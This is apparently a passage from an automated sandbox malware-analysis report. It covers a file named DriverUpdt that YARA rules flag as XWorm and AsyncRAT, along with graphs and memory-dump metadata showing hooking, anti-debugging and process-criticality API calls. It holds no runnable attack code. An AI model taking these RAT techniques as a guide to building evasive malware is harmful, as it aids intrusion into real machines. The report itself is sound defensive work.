                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:16
                          Start time:18:34:41
                          Start date:01/07/2024
                          Path:C:\Users\user\AppData\Roaming\DriverUpdt
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\DriverUpdt
                          Imagebase:0x2d0000
                          File size:86'528 bytes
                          MD5 hash:65485B0475B6C8A3B4F35BBA541938A6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\DriverUpdt, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 84%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:17
                          Start time:18:34:51
                          Start date:01/07/2024
                          Path:C:\Windows\System32\OpenWith.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                          Imagebase:0x7ff6cd8c0000
                          File size:123'984 bytes
                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:18
                          Start time:18:34:51
                          Start date:01/07/2024
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Imagebase:0x7ff7e52b0000
                          File size:55'320 bytes
                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:19
                          Start time:18:34:59
                          Start date:01/07/2024
                          Path:C:\Windows\System32\OpenWith.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                          Imagebase:0x7ff6cd8c0000
                          File size:123'984 bytes
                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:20
                          Start time:18:35:01
                          Start date:01/07/2024
                          Path:C:\Users\user\AppData\Roaming\DriverUpdt
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\DriverUpdt
                          Imagebase:0x840000
                          File size:86'528 bytes
                          MD5 hash:65485B0475B6C8A3B4F35BBA541938A6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                            Execution Graph

                            Execution Coverage:21.8%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:9.7%
                            Total number of Nodes:31
                            Total number of Limit Nodes:1
                            execution_graph
                            4516 7ff848f09d98
                            4518 7ff848f09da1 SetWindowsHookExW
                            4516->4518
                            4519 7ff848f09e71
                            4518->4519
                            4520 7ff848f07a51
                            4521 7ff848f07a6f CheckRemoteDebuggerPresent
                            4520->4521
                            4523 7ff848f07b0f
                            4521->4523
                            4548 7ff848f0b42e
                            4549 7ff848f0b46f
                            4548->4549
                            4550 7ff848f09858 RtlSetProcessIsCritical
                            4549->4550
                            4551 7ff848f0b49c
                            4550->4551
                            4524 7ff848f0ab25
                            4526 7ff848f0ab2f
                            4524->4526
                            4525 7ff848f0ac19
                            4526->4525
                            4530 7ff848f09858
                            4526->4530
                            4531 7ff848f09861 RtlSetProcessIsCritical
                            4530->4531
                            4533 7ff848f09932
                            4531->4533
                            4534 7ff848f09868
                            4535 7ff848f09871 RtlSetProcessIsCritical
                            4534->4535
                            4537 7ff848f09932
                            4535->4537
                            4537->4525
                            4538 7ff848f0a565
                            4539 7ff848f0a57f
                            4538->4539
                            4544 7ff848f09138
                            4539->4544
                            4541 7ff848f0a590
                            4542 7ff848f09138 RtlSetProcessIsCritical
                            4541->4542
                            4543 7ff848f0a59f
                            4541->4543
                            4542->4543
                            4544->4541
                            4545 7ff848f0b470
                            4544->4545
                            4546 7ff848f09858 RtlSetProcessIsCritical
                            4545->4546
                            4547 7ff848f0b49c
                            4546->4547
                            4547->4541
                            4552 7ff848f0764a
                            4553 7ff848f07a70 CheckRemoteDebuggerPresent
                            4552->4553
                            4555 7ff848f07b0f
                            4553->4555

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: CAP_^
                            • API String ID: 0-2920077663
                            • Opcode ID: 20ad0df7e119589af927ea39995456856159a6fe6858906a4f8f69ff944fe0f3
                            • Instruction ID: 4ddb0f213fa071c0712a7eb7fa919231f104973c9e83090407da20acc93e26e6
                            • Opcode Fuzzy Hash: 20ad0df7e119589af927ea39995456856159a6fe6858906a4f8f69ff944fe0f3
                            • Instruction Fuzzy Hash: CB22A030A2DA499FE799FB3884597B9B6D2FF89740F540579E40EC32C2EF28A8418745

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: H
                            • API String ID: 0-2852464175
                            • Opcode ID: 22fc89fba15c0f56651ef4092e11dc45db35d53c473672023544847be643c386
                            • Instruction ID: 6f2f16458d67d091d95d5a7683dbe9ad755c281969cf0b33299f675105322644
                            • Opcode Fuzzy Hash: 22fc89fba15c0f56651ef4092e11dc45db35d53c473672023544847be643c386
                            • Instruction Fuzzy Hash: 57C1B070F1D90A8FEB89FB68846627976D2FF99381F140579D04EC32D2EF38A8028755

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph
                            410 7ff848f0764a-7ff848f07b0d CheckRemoteDebuggerPresent
                            414 7ff848f07b15-7ff848f07b58
                            410->414
                            415 7ff848f07b0f
                            410->415
                            415->414
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: dc6991035fe03aade0c5fcfbdc81cc7cbfc46cc24784884c791af730c87c64e2
                            • Instruction ID: b15d7b1d0867a76383ae4bdd109478bcc2ff2f8fd44982702ef62cba385c44d1
                            • Opcode Fuzzy Hash: dc6991035fe03aade0c5fcfbdc81cc7cbfc46cc24784884c791af730c87c64e2
                            • Instruction Fuzzy Hash: 6E31B431908A1C8FDB58DF5CC8497FA7BE0EF55311F04416AD48AD7241DB74A8568B91
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be56ae21686dadbe1ee8ac21789fc8d35fc01bcf7a1e77c41b1181bf4a5b3f8e
                            • Instruction ID: 4aa319ab41dab4ff5c8348fdf88a208aed5fd0832498e0bc64143103d7fd3e78
                            • Opcode Fuzzy Hash: be56ae21686dadbe1ee8ac21789fc8d35fc01bcf7a1e77c41b1181bf4a5b3f8e
                            • Instruction Fuzzy Hash: F4F1A33090CB8D8FEBA8EF28C8557E937E1FF55351F04426AE84DC7295DB3899458B82
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 63f07216c9a6653004583fdd9b10c8b33f0856ae9810293e8f5d0f02997d8e0e
                            • Instruction ID: 779be597ac38a95eb35f38c6fd6139288e22b2354334cdb6c05d8fcf6aba0038
                            • Opcode Fuzzy Hash: 63f07216c9a6653004583fdd9b10c8b33f0856ae9810293e8f5d0f02997d8e0e
                            • Instruction Fuzzy Hash: 31E1D33090CA4E8FEBA8EF28C8557E977E1FF55351F14426AE84DC7291DF78A8448B81
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:

                            Control-flow Graph (interactive graph rendering not preserved; legend: Executed / Not Executed; nodes are basic-block address ranges, edges are node->node)
                            control_flow_graph 192 7ff848f09848-7ff848f0af32 197 7ff848f0af3a-7ff848f0af5b 192->197 198 7ff848f0af61-7ff848f0af6c 197->198 199 7ff848f0af6e 198->199 200 7ff848f0af74-7ff848f0af90 198->200 199->200
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID:
                            • API String ID: 2695349919-0

                            Control-flow Graph (interactive graph rendering not preserved; legend: Executed / Not Executed; nodes are basic-block address ranges, edges are node->node)
                            control_flow_graph 305 7ff848f09d98-7ff848f09d9f 306 7ff848f09daa-7ff848f09e1d 305->306 307 7ff848f09da1-7ff848f09da9 305->307 311 7ff848f09ea9-7ff848f09ead 306->311 312 7ff848f09e23-7ff848f09e30 306->312 307->306 313 7ff848f09e32-7ff848f09e6f SetWindowsHookExW 311->313 312->313 315 7ff848f09e71 313->315 316 7ff848f09e77-7ff848f09ea8 313->316 315->316
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: HookWindows
                            • String ID:
                            • API String ID: 2559412058-0

                            Control-flow Graph (interactive graph rendering not preserved; legend: Executed / Not Executed; nodes are basic-block address ranges, edges are node->node)
                            control_flow_graph 395 7ff848f09868-7ff848f09930 RtlSetProcessIsCritical 400 7ff848f09938-7ff848f0996d 395->400 401 7ff848f09932 395->401 401->400
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID:
                            • API String ID: 2695349919-0

                            Control-flow Graph (interactive graph rendering not preserved; legend: Executed / Not Executed; nodes are basic-block address ranges, edges are node->node)
                            control_flow_graph 403 7ff848f07a51-7ff848f07b0d CheckRemoteDebuggerPresent 407 7ff848f07b15-7ff848f07b58 403->407 408 7ff848f07b0f 403->408 408->407
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3321572971.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f00000_DriverUpdt.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2130192111.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (B$I$(B$I$(B$I$(B$I$(B$I$X73l
                            • API String ID: 0-4065089512
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: K%\
                            • API String ID: 0-2006441787
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2130192111.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>$I
                            • API String ID: 0-3301367642
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2130192111.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>$I
                            • API String ID: 0-3301367642
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129378410.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848e0d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000002.00000002.2130192111.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2129789865.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: M_^4$M_^7$M_^F$M_^J
                            • API String ID: 0-622050427
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2231328339.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (B"I$(B"I$(B"I$(B"I$(B"I
                            • API String ID: 0-3570690463
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2231328339.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>"I
                            • API String ID: 0-2459728092
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2231328339.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>"I
                            • API String ID: 0-2459728092
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000005.00000002.2229745764.00007FF848DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DED000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848ded000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000005.00000002.2231328339.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848fd0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2230485005.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_7ff848f00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: O_^8$O_^<$O_^?$O_^J$O_^K$O_^N$O_^Q$O_^Y
                            • API String ID: 0-3814653101
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389881427.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (B$I$(B$I$(B$I$(B$I$(B$I$X7ov
                            • API String ID: 0-421575882
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389881427.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>$I
                            • API String ID: 0-3301367642
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389881427.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8>$I
                            • API String ID: 0-3301367642
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec111fb182c628cd96aae436ba47584c89284db5c3d5ff85597976ae7571fa0e
                            • Instruction ID: 812f3d1aca105d0527ffe5d31cb93f2de79cd5666426efe9c481067eda851059
                            • Opcode Fuzzy Hash: ec111fb182c628cd96aae436ba47584c89284db5c3d5ff85597976ae7571fa0e
                            • Instruction Fuzzy Hash: 1C714C77E0D9958FE756EB3CB8610E57B60EF11BB6F0802B7C08C8A0C3FE1A58568645
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77a32c4a09b0129fafd3178c3875952cbd233b0f66c414de6d06b03f4baee1d7
                            • Instruction ID: 8495b34376bea0c0644d1111bc63be8adc6a38f3005430a765161036812551f8
                            • Opcode Fuzzy Hash: 77a32c4a09b0129fafd3178c3875952cbd233b0f66c414de6d06b03f4baee1d7
                            • Instruction Fuzzy Hash: CE411777D0DDD68EE31AEB7CB8510E53B60EF11BA2F0901B7D04C860D3EE266C868645
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0fb4a881ee75974651ad8466b4fd8a63e3bc320d8cbc39d310ef4da260d59789
                            • Instruction ID: e0304ef855928b6a1478f1cf8d90df38bc2e498a78f36796cbf49991d295dbb0
                            • Opcode Fuzzy Hash: 0fb4a881ee75974651ad8466b4fd8a63e3bc320d8cbc39d310ef4da260d59789
                            • Instruction Fuzzy Hash: 4231083191CB489FDB18DF5CA8066F97BE0FB99711F00422FE449D3691CB31A8568BC2
                            Memory Dump Source
                            • Source File: 00000008.00000002.2387932928.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848e0d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e56dd9f59f38c4bff80c5e3811a87d32763e66047f4710d630b533fa9131efdf
                            • Instruction ID: 8e3462d11a1082b47829a3748a4bd790b38563e57408114a714203d6ac59530d
                            • Opcode Fuzzy Hash: e56dd9f59f38c4bff80c5e3811a87d32763e66047f4710d630b533fa9131efdf
                            • Instruction Fuzzy Hash: 8C41E37180DBC44FE7569B3898519523FF0FF57260B1905EFD088CB1A3D629A84AC7A2
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389881427.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f9ccbb1a89d9a01ffad5dbcfb3e7d97c3b85813afb6936d4a516a6d6f91dfa31
                            • Instruction ID: 7e1c3ae5898979a2193a2b7b82a81bbc69854c81746028a451958890e6b21308
                            • Opcode Fuzzy Hash: f9ccbb1a89d9a01ffad5dbcfb3e7d97c3b85813afb6936d4a516a6d6f91dfa31
                            • Instruction Fuzzy Hash: 41F09A31A0C5458FDB54EB5CA4448A8B7E0FF15360F4500B6E15DD71A3DB2AAC608764
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: M_^$M_^$M_^$M_^
                            • API String ID: 0-1397233021
                            • Opcode ID: 2c1b44a8a4f5a740268b0ac3a43ec9858c1ddf7caaa8c2ab8f71ccf376b26791
                            • Instruction ID: a13c0346b16604232fe1c41bc24cfdf77232e2f572919fcd7528b79ab2eeea7a
                            • Opcode Fuzzy Hash: 2c1b44a8a4f5a740268b0ac3a43ec9858c1ddf7caaa8c2ab8f71ccf376b26791
                            • Instruction Fuzzy Hash: D941D473E1E6D25FE34A972868690E53FA0EF12794B4D02F6C0C88B0D3EE1D58079756
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.2389012085.00007FF848F25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff848f25000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: M_^4$M_^7$M_^F$M_^J
                            • API String ID: 0-622050427
                            • Opcode ID: 90f68846e37aad839527a385a5ee575dc6928c014df719ce68c663142915cb22
                            • Instruction ID: 4b251d57f47bb37acb7270bcb3fcd5e7a9f7ff78876cdeb73e676b5544b6a454
                            • Opcode Fuzzy Hash: 90f68846e37aad839527a385a5ee575dc6928c014df719ce68c663142915cb22
                            • Instruction Fuzzy Hash: 6C213B7761A465DED3427B7DB8045DA3750DF942B8B8503B2E098CF083FE1C70868AD4
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2593745197.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (B#I$(B#I$(B#I$(B#I$(B#I$X7q0
                            • API String ID: 0-1954526268
                            • Opcode ID: 4111b2f0ebe2ea133612e8d69e83d3acf7a60913e04266520c01efd57d83faf5
                            • Instruction ID: 3560bc6cd64c544b8a376166c2e23945fefc08bef354c5ac2056f47564d8e058
                            • Opcode Fuzzy Hash: 4111b2f0ebe2ea133612e8d69e83d3acf7a60913e04266520c01efd57d83faf5
                            • Instruction Fuzzy Hash: 63D13131D0EA8A5FE795AB2858145B5BBA0EF1A390F1801FFD54DCB1D3EE1CA805C355
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2593745197.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
